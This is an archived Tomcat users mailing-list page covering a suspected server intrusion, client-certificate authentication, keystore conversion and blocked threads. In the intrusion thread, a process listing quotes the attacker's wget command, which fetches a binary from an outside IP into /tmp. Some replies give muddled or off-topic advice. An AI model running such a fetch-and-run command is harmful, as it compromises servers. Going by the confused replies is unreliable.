RE: Regarding i think an intrusion

2014-05-05 Thread Martin Gainty
 Subject: Re: Regarding i think an intrusion
 From: lsantagost...@gmail.com
 To: users@tomcat.apache.org
 
 Hello Chris, but this logfile was only one day.
MG> Ay Caramba!
 
 Maybe I had a concept mismatch trying to capture the exact moment when the
 execution begins.
 
 My command was
 
 while [ true ]; do CUENTO=$(ps -fea | grep wget | grep -v grep | grep -v 127.0.0.1 | wc -l);
   if [ "$CUENTO" -gt 0 ]; then PIDJAVA=$(ps -fea | grep java | grep -v grep | awk '{ print $2 }');
     echo -e "Se encontro wget corriendo, sacando dump de JVM..."; kill -3 $PIDJAVA; fi;
   sleep 3; done
 
 Maybe too many dumps all together, now I'm trying to get a live capture
 without luck =(
 
 If you know a better method, please let me know it.
 
 Thanks for your effort, kind regards,
 Leonardo
 
 Saludos.-
 Leonardo Santagostini
MG> Tomcat APR cannot use WebSockets with JDK 1.6 ... you need to use JDK @ 1.7 (now)
MG> this
ContainerBackgroundProcessor[StandardEngine[Catalina]] daemon prio=10 
tid=0x52867800 nid=0x2550 waiting on condition [0x4105e000]
   java.lang.Thread.State: TIMED_WAITING (sleeping)
 at java.lang.Thread.sleep(Native Method)
 at 
org.apache.catalina.core.ContainerBase$ContainerBackgroundProcessor.run(ContainerBase.java:1508)
 at java.lang.Thread.run(Thread.java:662)
MG> These informational log entries produce A LOT of noise
MG> log4j.properties
MG> log4j.logger.org.quartz=OFF  // (Shut up, Quartz)

MG> that
ajp-bio-8009-exec-37 daemon prio=10 tid=0x2aaac07fd800 nid=0x2656 
runnable [0x46f34000]
   java.lang.Thread.State: RUNNABLE
 at java.util.regex.Pattern$6.isSatisfiedBy(Pattern.java:4763)
 at java.util.regex.Pattern$CharProperty.match(Pattern.java:3345)
 at java.util.regex.Pattern$Curly.match0(Pattern.java:3770)
 at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
 at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
 at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
 at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
 at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
 at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
 at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
 at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
 at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
 at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
 at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
 at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
 at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
 at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
 at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
 at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
 at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
 at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
 at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
 at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
 at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
 at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
 at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
 at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
 at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
 at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
 at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
 at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
 at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
 at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
 at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
 at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
 at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
 at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
 at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
 at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
 at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
 at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
 at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
 at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
 at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
 at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
 at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
 at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
 at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
 at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
 at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
 at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
 at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
 at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
 at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
 at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
 at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
 at 

RE: Configuration of auth-constraint ?

2014-05-04 Thread Martin Gainty

 Date: Sun, 4 May 2014 12:42:04 +0530
 Subject: Configuration of auth-constraint ?
 From: motgu...@gmail.com
 To: users@tomcat.apache.org
 
 I am using client certificates in my application. Here is the configuration
 i did
 
 Step1:-
 
 Added below snippet in tomcat-users.xml file
 
 <role rolename="certrole"/>
 <user username="ignoreAndCheckInWebApp" password="nopass"
 roles="certrole"/>
 
 
 Step 2:-
 Added below snippet in web.xml
 
  <security-constraint>
    <web-resource-collection>
      <web-resource-name>Client Certificate Auth</web-resource-name>
      <url-pattern>/MyClientAuthenticator.jsp</url-pattern>
    </web-resource-collection>
    <auth-constraint>
      <role-name>certrole</role-name>
    </auth-constraint>
  </security-constraint>
  <login-config>
    <auth-method>CLIENT-CERT</auth-method>
  </login-config>
 
 placed a jar file containing MySSlAuthentication.java into the lib folder
 of Tomcat.
 
 
 Step3:-
 Then added below valve element under tomcat\conf\context.xml
 
  <Valve className="MySSlAuthentication"/>
 
 
 So it's more or less the procedure mentioned at
 http://twoguysarguing.wordpress.com/2009/11/03/mutual-authentication-with-client-cert-tomcat-6-and-httpclient/
 
 
 My understanding is that when the browser tries to call MyClientAuthenticator.jsp,
 the server asks the browser for the client certificate. But why do we need the
 two entries
 <role rolename="certrole"/>
 <user username="ignoreAndCheckInWebApp" password="nopass"
 roles="certrole"/>
 under tomcat-users.xml, and what is the use of the entry below?
 
 <auth-constraint>
   <role-name>certrole</role-name>
 </auth-constraint>

MG> for the URL presented at /MyClientAuthenticator.jsp
   <url-pattern>/MyClientAuthenticator.jsp</url-pattern>
 </web-resource-collection>
 <auth-constraint>

MG> The role from tomcat-users.xml defined as 'certrole'
   <role-name>certrole</role-name>
 </auth-constraint>
   </security-constraint>
   <login-config>

MG> would be authenticated (based on the contents of the presented Client Cert)
 <auth-method>CLIENT-CERT</auth-method>
   </login-config>

MG> Makes Sense?
  

RE: Tomcat7 Client Certicate Authentication Using Datasource Realm Fails

2014-05-03 Thread Martin Gainty


 Date: Sat, 3 May 2014 19:31:17 -0400
 Subject: Tomcat7 Client Certicate Authentication Using Datasource Realm Fails
 From: dhayamoorthi2...@gmail.com
 To: users@tomcat.apache.org
 
 Hi,
 
 In Tomcat7, we are trying to do client certificate authentication using
 datasource realm. But it fails.
 
 Please find the configuration below:
 
 server.xml:
 
 <?xml version="1.0" encoding="UTF-8" standalone="no" ?>
 <Server port="8005" shutdown="SHUTDOWN"><Listener SSLEngine="on"
 className="org.apache.catalina.core.AprLifecycleListener"/>
 <Listener className="org.apache.catalina.core.JasperListener"/>
 <Listener
 className="org.apache.catalina.core.JreMemoryLeakPreventionListener"/>
 <Listener
 className="org.apache.catalina.mbeans.GlobalResourcesLifecycleListener"/>
 <Listener
 className="org.apache.catalina.core.ThreadLocalLeakPreventionListener"/>
 <!-- <GlobalNamingResources><Resource auth="Container" description="User
 database that can be updated and saved"
 factory="org.apache.catalina.users.MemoryUserDatabaseFactory"
 name="UserDatabase" pathname="conf/tomcat-users.xml"
 type="org.apache.catalina.UserDatabase"/>
 </GlobalNamingResources> -->
 <Service name="Catalina">
 <Connector SSLEnabled="true" clientAuth="true" connectionTimeout="1"
 keyAlias="masfed_server_dit"
 keystoreFile="/opt/ADP/keystores/masfed_server_dit.jks" keystorePass="sso@di"
 maxThreads="150" port="8443"
 protocol="org.apache.coyote.http11.Http11Protocol" scheme="https"
 secure="true" server="Server" sslProtocol="TLS"
 truststorefile="/opt/ADP/keystores/masfed_server_dit.jks"
  truststorepass="sso@di" enablelookups="false"/>
 <Connector port="8009" protocol="AJP/1.3" redirectPort="8443"/>
 <Engine defaultHost="localhost" name="Catalina">
 <!-- <Realm className="org.apache.catalina.realm.MemoryRealm"
 resourceName="UserDatabase"/> -->
 <!--
 <Realm className="org.apache.catalina.realm.LockOutRealm"><Realm
 className="org.apache.catalina.realm.UserDatabaseRealm"
 resourceName="UserDatabase"/>
 </Realm>
 -->
 <GlobalNamingResources>
 <Realm className="org.apache.catalina.realm.DataSourceRealm"
   dataSourceName="jdbc/FederationDS"
   userTable="T_USER" userNameCol="USERNAME" userCredCol="PASSWORD"
   userRoleTable="T_USER_ROLES" roleNameCol="ROLENAME" debug="99"
   allRolesMode="authOnly" />
 </GlobalNamingResources>
 
 <Host appBase="webapps" autoDeploy="true" name="localhost"
 unpackWARs="true"><Valve
 className="org.apache.catalina.valves.AccessLogValve" directory="logs"
 pattern="%h %l %u %t &quot;%r&quot; %s %b" prefix="localhost_access_log."
 suffix=".txt"/>
 </Host>
 </Engine>
 </Service>
 </Server>
 
 
 security role configuration tomcat_base/conf/web.xml:
 -
 
 <security-role>
   <role-name>masFedClient</role-name>
 </security-role>
 <security-constraint>
   <web-resource-collection>
     <web-resource-name>all</web-resource-name>
     <url-pattern>/*</url-pattern>
   </web-resource-collection>
   <auth-constraint>
     <role-name>masFedClient</role-name>
   </auth-constraint>
   <user-data-constraint>
     <transport-guarantee>CONFIDENTIAL</transport-guarantee>
   </user-data-constraint>
 </security-constraint>
 <login-config>
   <auth-method>CLIENT-CERT</auth-method>
   <!--  <realm-name>tomcat-users</realm-name> -->
   <realm-name>jdbc/FederationDS</realm-name>
 </login-config>
 
 Database has all the required tables and columns.
 
 But authentication fails with the below mentioned error:
 
 FINE:  Checking validity for
 '$'
MG> this is an insane value..change it to something meaningful using [A-Z][0-9] characters
MG> besides which your user_name length is WAY beyond the 15 byte allocation for the table
create table T_USER
(
  user_name varchar(15) not null primary key,
  user_pass varchar(15) not null
);
MG>

 May 03, 2014 7:16:29 PM org.apache.catalina.realm.RealmBase authenticate
 FINE:  Checking validity for 'CN=VeriSign Class 3 Extended Validation SSL
 SGC CA, OU=Terms of use at https://www.verisign.com/rpa (c)06, OU=VeriSign
 Trust Network, O=VeriSign, Inc., C=US'
 May 03, 2014 7:16:29 PM org.apache.catalina.realm.RealmBase authenticate
 FINE:  Checking validity for 'CN=VeriSign Class 3 Public Primary
 Certification Authority - G5, OU=(c) 2006 VeriSign, Inc. - For authorized
 use only, OU=VeriSign Trust Network, O=VeriSign, Inc., C=US'
 May 03, 2014 7:16:29 PM org.apache.catalina.realm.RealmBase getPrincipal
 FINE: Got user name from X509 certificate:
 $$
 May 03, 2014 7:16:29 PM org.apache.catalina.authenticator.AuthenticatorBase
 invoke
 FINE:  Failed authenticate() test
 
 For security purpose, I had made the certificate cn name as $$.
MG> cn is ROLE not the user_name
MG> https://tomcat.apache.org/tomcat-7.0-doc/realm-howto.html

 The error message does not tell why the authentication is failing.
MG> yes it does ..it cannot authenticate
$$

 Do I need to enable additional 

RE: Reg: Issue in SSL Authentication in Tomcat after new client certificate has been created / added, Tomcat has to be started every time i add a new client certificate

2014-05-02 Thread Martin Gainty
Krishna

Let me check with the engineers who want to work for you for free




 From: karip...@teksystems.com
 To: users@tomcat.apache.org
 Date: Fri, 2 May 2014 04:55:18 -0400
 Subject: Reg: Issue in SSL Authentication in Tomcat after new client 
 certificate has been created / added, Tomcat has to be started every time i 
 add a new client certificate
 
 
 Hi,
 
 1. We are using Tomcat 7.0.39 in our application.
 2. We have implemented Two Way SSL authentication using java keytool
 3. Issue is, when we create a new client certificate and add it to Java 
 Keystore(.jks), we are unable to authenticate unless we restart the Tomcat.
 So, every time we add a new client certificate, we are restarting the Tomcat. 
 Is there any way to handle this scenario without restarting the Tomcat?
 
 I have read the document thoroughly, but I didn't get any information 
 regarding this. Can you please help us on this.
 Thanks In advance.
 
 --
 Thanks  Regards,
 
 Krishna Chaitanya Aripaka | Consultant
 Cell: +91 92912 41123   | Work  : +91 40 30113024
 
 
 -
 To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
 For additional commands, e-mail: users-h...@tomcat.apache.org
 
  

RE: BLOCKED threads

2014-05-02 Thread Martin Gainty
Managing Provider Tokens
Like the provider, the consumer must be responsible for managing the 
OAuth tokens. The necessary interface for managing the consumer tokens 
is OAuthConsumerTokenServices which are only accessible via factory method. 
Assuming that the consumer can leverage an active HTTP session, the default 
HttpSessionBasedTokenServices and HttpSessionBasedTokenServicesFactory should 
be adequate.

so it appears that Spring is looking for an implementor for 
OAuthConsumerTokenServices either
HttpSessionBasedTokenServices OR
HttpSessionBasedTokenServicesFactory



http://spring-security-oauth.codehaus.org/oauth1.html#Managing_Provider_Tokens

Martin


 Date: Fri, 2 May 2014 15:22:01 -0700
 From: rallav...@gmail.com
 To: users@tomcat.apache.org
 Subject: BLOCKED threads
 
 All,
 
 Tomcat Version: 7.0.47
 JVM Version: 1.7.0_51-b13
 
 I see many blocked threads (90) in the thread dump. There are mainly two 
 monitors that block 69 threads.
 
 One of them is below. It appears that it is simply trying to log.
 --
 http-bio-28080-exec-396 daemon prio=10 tid=0x7fcbc814f000 
 nid=0x5804 runnable [0x7fcc2144d000]
 java.lang.Thread.State: RUNNABLE
  at java.lang.Throwable.getStackTraceElement(Native Method)
  at java.lang.Throwable.getOurStackTrace(Throwable.java:827)
  - locked 0x0007e1886340 (a java.util.NoSuchElementException)
  at java.lang.Throwable.printStackTrace(Throwable.java:656)
  - locked 0x0007e207a5a8 (a java.io.PrintWriter)
  at java.lang.Throwable.printStackTrace(Throwable.java:721)
  at 
 java.util.logging.SimpleFormatter.format(SimpleFormatter.java:157)
  - locked 0x0007008187e8 (a java.util.logging.SimpleFormatter)
  at java.util.logging.StreamHandler.publish(StreamHandler.java:196)
  - locked 0x0007008187b0 (a java.util.logging.ConsoleHandler)
  at 
 java.util.logging.ConsoleHandler.publish(ConsoleHandler.java:105)
  at java.util.logging.Logger.log(Logger.java:610)
  at java.util.logging.Logger.doLog(Logger.java:631)
  at java.util.logging.Logger.logp(Logger.java:831)
  at org.apache.juli.logging.DirectJDKLog.log(DirectJDKLog.java:185)
  at 
 org.apache.juli.logging.DirectJDKLog.error(DirectJDKLog.java:151)
  at 
 org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:260)
  at 
 org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:123)
  at 
 org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:502)
  at 
 org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:171)
  at 
 org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:100)
  at 
 org.apache.catalina.valves.AccessLogValve.invoke(AccessLogValve.java:953)
  at 
 org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:118)
  at 
 org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:408)
  at 
 org.apache.coyote.http11.AbstractHttp11Processor.process(AbstractHttp11Processor.java:1041)
  at 
 org.apache.coyote.AbstractProtocol$AbstractConnectionHandler.process(AbstractProtocol.java:603)
  at 
 org.apache.tomcat.util.net.JIoEndpoint$SocketProcessor.run(JIoEndpoint.java:310)
  - locked 0x0007e0ba5dd8 (a 
 org.apache.tomcat.util.net.SocketWrapper)
  at 
 java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1145)
  at 
 java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:615)
  at java.lang.Thread.run(Thread.java:744)
 
 --
 
 The second one has the lock on StandardClassLoader.
 
 --
 
 http-bio-28080-exec-605 daemon prio=10 tid=0x7fcbc82b8800 
 nid=0x77e6 runnable [0x7fcb919d6000]
 java.lang.Thread.State: RUNNABLE
  at java.lang.ClassLoader.findLoadedClass0(Native Method)
  at java.lang.ClassLoader.findLoadedClass(ClassLoader.java:1093)
  at java.lang.ClassLoader.loadClass(ClassLoader.java:407)
  - locked 0x000700810fc8 (a 
 org.apache.catalina.loader.StandardClassLoader)
  at java.lang.ClassLoader.loadClass(ClassLoader.java:358)
  at 
 java.util.ResourceBundle$Control.newBundle(ResourceBundle.java:2566)
  at java.util.ResourceBundle.loadBundle(ResourceBundle.java:1436)
  at java.util.ResourceBundle.findBundle(ResourceBundle.java:1400)
  at java.util.ResourceBundle.findBundle(ResourceBundle.java:1354)
  at java.util.ResourceBundle.findBundle(ResourceBundle.java:1354)
  at 
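
A way to summarise a dump like the one above by monitor: which thread holds each lock and how many threads are waiting to enter it. This is an added example, not code from anyone on the thread; the dump embedded in it is constructed (thread names and monitor classes are borrowed from the post), and `sample_dump` and `lock_summary` are names invented here.

```sh
#!/bin/sh
# Added example (not from the thread): group a HotSpot thread dump by monitor.

# Constructed dump in jstack / kill -3 layout. Thread names and monitor
# classes are borrowed from the post; the stacks are shortened and invented.
sample_dump() {
cat <<'EOF'
"http-bio-28080-exec-396" daemon prio=10 tid=0x01 nid=0x5804 runnable [0x01]
   java.lang.Thread.State: RUNNABLE
    at java.lang.Throwable.printStackTrace(Throwable.java:721)
    at java.util.logging.StreamHandler.publish(StreamHandler.java:196)
    - locked <0x0007008187b0> (a java.util.logging.ConsoleHandler)

"http-bio-28080-exec-401" daemon prio=10 tid=0x02 nid=0x5810 waiting for monitor entry [0x02]
   java.lang.Thread.State: BLOCKED (on object monitor)
    at java.util.logging.StreamHandler.publish(StreamHandler.java:174)
    - waiting to lock <0x0007008187b0> (a java.util.logging.ConsoleHandler)

"http-bio-28080-exec-402" daemon prio=10 tid=0x03 nid=0x5811 waiting for monitor entry [0x03]
   java.lang.Thread.State: BLOCKED (on object monitor)
    at java.util.logging.StreamHandler.publish(StreamHandler.java:174)
    - waiting to lock <0x0007008187b0> (a java.util.logging.ConsoleHandler)

"http-bio-28080-exec-605" daemon prio=10 tid=0x04 nid=0x77e6 runnable [0x04]
   java.lang.Thread.State: RUNNABLE
    at java.lang.ClassLoader.loadClass(ClassLoader.java:407)
    - locked <0x000700810fc8> (a org.apache.catalina.loader.StandardClassLoader)

"http-bio-28080-exec-610" daemon prio=10 tid=0x05 nid=0x77f0 waiting for monitor entry [0x05]
   java.lang.Thread.State: BLOCKED (on object monitor)
    at java.lang.ClassLoader.loadClass(ClassLoader.java:406)
    - waiting to lock <0x000700810fc8> (a org.apache.catalina.loader.StandardClassLoader)
EOF
}

# lock_summary: read a thread dump on stdin and print, most contended first,
#   <waiters> <monitor address> <monitor class> held-by=<owner thread>
# Addresses are matched with or without the <...> brackets, so a dump whose
# brackets were stripped by a mail archive still parses.
lock_summary() {
  awk '
    function addr(s)  { match(s, /0x[0-9a-fA-F]+/); return substr(s, RSTART, RLENGTH) }
    function klass(s) { match(s, /\(a [^)]+\)/);    return substr(s, RSTART + 3, RLENGTH - 4) }
    /^"/                 { split($0, f, "\""); thread = f[2]; next }
    # A thread parked in Object.wait() prints "waiting on" and, further down
    # its stack, "locked" for the same monitor it has released: not an owner.
    /- waiting on /      { released[thread, addr($0)] = 1 }
    /- waiting to lock / { a = addr($0); waiters[a]++; cls[a] = klass($0) }
    /- locked /          { a = addr($0); cls[a] = klass($0)
                           if (!((thread, a) in released)) owner[a] = thread }
    END {
      for (a in waiters)
        print waiters[a], a, cls[a], "held-by=" ((a in owner) ? owner[a] : "unknown")
    }' | sort -rn
}

# Summarise the file given as $1, or the constructed sample when run bare.
if [ -n "${1:-}" ]; then
  lock_summary < "$1"
else
  sample_dump | lock_summary
fi
```

The owner's own stack is the next thing to read: a holder that is RUNNABLE inside logging or class loading, as in the post, points at slow work under the lock rather than a deadlock.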

RE: OpenSSL and keytool misery

2014-05-01 Thread Martin Gainty
apparently the provided cert that came with your P12 is not a X509v3 cert

assuming $1 is the root name of the PEM file

openssl pkcs12 -in $1.p12 -out $1.pem -nodes -clcerts

vi $1.pem
and you should see something like:

/snip
Key Attributes
X509v3 Key Usage: nn
/snip

please verify
Martin 


 Subject: Re: OpenSSL and keytool misery
 From: dmik...@gopivotal.com
 Date: Thu, 1 May 2014 08:53:10 -0700
 To: users@tomcat.apache.org
 
 On May 1, 2014, at 7:56 AM, Christopher Schultz 
 ch...@christopherschultz.net wrote:
 
  All,
  
  I've been trying to convert an OpenSSL-generated key and certificate
  into a keystore for use with Tomcat. I had given up on this months ago
  and now I'm resuming my attempts.
  
  What I've done so far:
  
  1. Created an RSA private key using openssl
  2. Created a certificate request using openssl
  3. Obtained a signed certificate from a CA
  4. Attempted to combine my key and certificate into a PKCS12 file
  using openssl:
  
  $ openssl pkcs12 -export -in ${HOSTNAME}.crt \
   -inkey ${HOSTNAME}.key > ${HOSTNAME}.p12
  
  5. Import the PKCS12 store into a Java keystore using keytool:
  
  $ keytool -importkeystore -srckeystore ${HOSTNAME}.p12 \
   -destkeystore ${HOSTNAME}.jks -srcstoretype pkcs12
  
  This is what my keytool now says is in the store:
  
  $ keytool -list -keystore conf/${HOSTNAME}.jks
  Enter keystore password:
  
  Keystore type: JKS
  Keystore provider: SUN
  
  Your keystore contains 1 entry
  
  1, May 1, 2014, PrivateKeyEntry,
  Certificate fingerprint (MD5):
  EC:FE:0A:7F:12:3D:19:39:DD:82:7A:7D:F9:AE:18:9A
  
  I set the password for the Java keystore to changeit. Now, in Tomcat:
  
 <Connector port="8443"
   protocol="org.apache.coyote.http11.Http11NioProtocol"
   keystoreFile="${catalina.base}/conf/${HOSTNAME}.jks"
   keystorePass="changeit"
 
 Have you tried setting keyAlias and keyPass?
 
 Dan
 
   URIEncoding="UTF-8"
   sslProtocol="SSL"
   SSLEnabled="true"
   scheme="https"
   secure="true"
   />
  
  (Note that ${HOSTNAME}.jks has been expanded in my actual server.xml
  file.)
  
  Here's what happens when I launch Tomcat:
  
  org.apache.catalina.LifecycleException: Failed to initialize component
  [Connector[org.apache.coyote.http11.Http11NioProtocol-8443]]
 at
  org.apache.catalina.util.LifecycleBase.init(LifecycleBase.java:106)
 at
  org.apache.catalina.core.StandardService.initInternal(StandardService.java:5
  59)
 at
  org.apache.catalina.util.LifecycleBase.init(LifecycleBase.java:102)
 at
  org.apache.catalina.core.StandardServer.initInternal(StandardServer.java:813
  )
 at
  org.apache.catalina.util.LifecycleBase.init(LifecycleBase.java:102)
 at org.apache.catalina.startup.Catalina.load(Catalina.java:638)
 at org.apache.catalina.startup.Catalina.load(Catalina.java:663)
 at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
 at
  sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:39
  )
 at
  sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl
  .java:25)
 at java.lang.reflect.Method.invoke(Method.java:597)
 at org.apache.catalina.startup.Bootstrap.load(Bootstrap.java:280)
 at org.apache.catalina.startup.Bootstrap.main(Bootstrap.java:454)
  Caused by: org.apache.catalina.LifecycleException: Protocol handler
  initialization failed
 at
  org.apache.catalina.connector.Connector.initInternal(Connector.java:980)
 at
  org.apache.catalina.util.LifecycleBase.init(LifecycleBase.java:102)
 ... 12 more
  
  
  Caused by: java.security.UnrecoverableKeyException: Cannot recover key
 at
  sun.security.provider.KeyProtector.recover(KeyProtector.java:311)
 at
  sun.security.provider.JavaKeyStore.engineGetKey(JavaKeyStore.java:121)
 at
  sun.security.provider.JavaKeyStore$JKS.engineGetKey(JavaKeyStore.java:38)
 at java.security.KeyStore.getKey(KeyStore.java:763)
 at
  com.sun.net.ssl.internal.ssl.SunX509KeyManagerImpl.init(SunX509KeyManagerImpl.java:113)
 at
  com.sun.net.ssl.internal.ssl.KeyManagerFactoryImpl$SunX509.engineInit(KeyMan
  agerFactoryImpl.java:48)
 at
  javax.net.ssl.KeyManagerFactory.init(KeyManagerFactory.java:239)
 at
  org.apache.tomcat.util.net.jsse.JSSESocketFactory.getKeyManagers(JSSESocketF
  actory.java:560)
 at
  org.apache.tomcat.util.net.jsse.JSSESocketFactory.getKeyManagers(JSSESocketF
  actory.java:489)
 at
  org.apache.tomcat.util.net.NioEndpoint.bind(NioEndpoint.java:493)
 at
  org.apache.tomcat.util.net.AbstractEndpoint.init(AbstractEndpoint.java:640)
 at
  org.apache.coyote.AbstractProtocol.init(AbstractProtocol.java:434)
 at
  org.apache.coyote.http11.AbstractHttp11JsseProtocol.init(AbstractHttp11JsseP
  rotocol.java:119)
 at
  

RE: Regarding i think an intrusion

2014-04-30 Thread Martin Gainty

 Date: Wed, 30 Apr 2014 12:35:52 -0300
 Subject: Re: Regarding i think an intrusion
 From: lsantagost...@gmail.com
 To: users@tomcat.apache.org
 
 Hello list,
 
 well my homework is done
 
 Here are the links:
 
 setenv.sh: http://pastebin.com/EN1mXDFi
 catalina.sh: http://pastebin.com/1vRVLbSm
 web.xml: http://pastebin.com/BqEfiXXm
 server.xml: http://pastebin.com/wfzE8bYU
 logging.properties: http://pastebin.com/Qurk8sLU
 catalina.properties: http://pastebin.com/jkfY1ZRQ
 tree + logsfiles: http://pastebin.com/j3tip4ij

MG> Please paste the contents of the following log files into Pastebin and send us the link:

-rw-rw-r-- 1 tomcat tomcat  5.0K Apr 30 05:38 localhost.2014-04-30.log
-rw-rw-r-- 1 tomcat tomcat  5.4M Apr 30 12:19 localhost_access_log.2014-04-30.txt
-rw-rw-r-- 1 tomcat tomcat     0 Apr 30 05:38 manager.2014-04-30.log
-rw-rw-r-- 1 tomcat tomcat  3.7M Apr 30 12:19 PDI_access_log.2014-04-30.txt
-rw-rw-r-- 1 tomcat tomcat   43M Apr 30 12:18 portal-ht.log
-rw-rw-r-- 1 tomcat tomcat  583K Apr 30 10:09 portal-mh.log
-rw-rw-r-- 1 tomcat tomcat   58M Apr 30 12:19 portal-pdi.log
-rw-rw-r-- 1 tomcat tomcat  3.5M Apr 30 12:18 portal-rt.log
-rw-rw-r-- 1 tomcat tomcat  3.6M Apr 30 12:18 probe.log
-rw-rw-r-- 1 tomcat tomcat  591K Apr 30 12:18 RT_access_log.2014-04-30.txt

MG> Kind regards from the USA

 
 Note that logsfiles are not the logfiles themselves but only a ls -lah (just
 for you to see the log sizes)
 
 A little more about the infrastructure I've mounted; I'll do some ascii art.
 
 
 internet --- FW --nat--Haproxy (1)--Apache(2)-- mod_jk
 (3)--Haproxy(4)-- Tomcat7(5) -- haproxy(6) --Tomcat(7)
 
 
 Apache(2) is serving static content so haproxy(1) at the first level does
 http round robin balancing
 Apache(2) connects to tomcat(5) through haproxy(4) (using L4 connection)
 using mod_jk(3)
 Tomcat(5) are the main app server (the ones gets intruded) who uses
 tomcat(7) (solr service) using haproxy(6) using L4 connection.
 
 Versions:
 
 Apache: 2.2.17
 mod_jk: 1.2.31
 haproxy: 1.4.22
 Tomcat: 7.0.53
 Java: 1.6.0.41
 
 [root@arcbaappvrt05 tomcat]# /usr/java/default/bin/java -version
 java version 1.6.0_41
 Java(TM) SE Runtime Environment (build 1.6.0_41-b02)
 Java HotSpot(TM) 64-Bit Server VM (build 20.14-b01, mixed mode)
 
 OS: CentOS 5.8 64 bit
 
 [root@arcbaappvrt05 tomcat]# uname -a
 Linux arcbaappvrt05.tic.yellargentina.com 2.6.18-308.el5 #1 SMP Tue Feb 21
 20:06:06 EST 2012 x86_64 x86_64 x86_64 GNU/Linux
 [root@arcbaappvrt05 tomcat]# cat /etc/redhat-release
 CentOS release 5.8 (Final)
 [root@arcbaappvrt05 tomcat]#
 
 For now I haven't seen that the squid process was launched, so I couldn't do a
 dump
 
 Let me know if you need more information.
 
 BTW, pastebin links will work for one week.
 
 Kind regards, yours
 
 
 
 
 Saludos.-
 Leonardo Santagostini
 
 http://ar.linkedin.com/in/santagostini
 
 
 
 
 
 2014-04-30 11:09 GMT-03:00 Leonardo Santagostini lsantagost...@gmail.com:
 
  Ok, i will do the following:
 
  1) thread dump of running tomcat instance
  2) Pastebin the running tomcat config
 
  I think at mid day will have all the info.
 
  Thanks all for replying me and all the responses.
 
  Regards, Leonardo
 
  Saludos.-
  Leonardo Santagostini
 
  http://ar.linkedin.com/in/santagostini
 
 
 
 
 
  2014-04-30 10:55 GMT-03:00 Christopher Schultz 
  ch...@christopherschultz.net:
 
  Konstantin,
 
  On 4/29/14, 4:54 PM, Konstantin Kolinko wrote:
   2014-04-30 0:41 GMT+04:00 Leonardo Santagostini
   lsantagost...@gmail.com:
   Hello Dan,
  
   Nop, the attacker is executing locally the following
  
   tomcat    8882     1  0 Apr27 ?        00:00:00 sh /tmp/4.sh
   tomcat    8893  8882  0 Apr27 ?        00:00:00 wget http://218.199.102.59/.xy/squid32 -O /tmp/squid
  
   And then launches squid, which tries to connect via ssh to various
   places.
  
   Right now its time to leave the office, but in a few hours i will
   paste in pastebin access logs, config files, wherever you tell
   me.
  
   This is my pstree
  
   [root@arcbaappvrt05 apache-tomcat-7.0.53]# pstree
   init─┬─atd
        ├─java─┬─sh───wget
        │      └─263*[{java}]
  
   sh launched by tomcat's java?
 
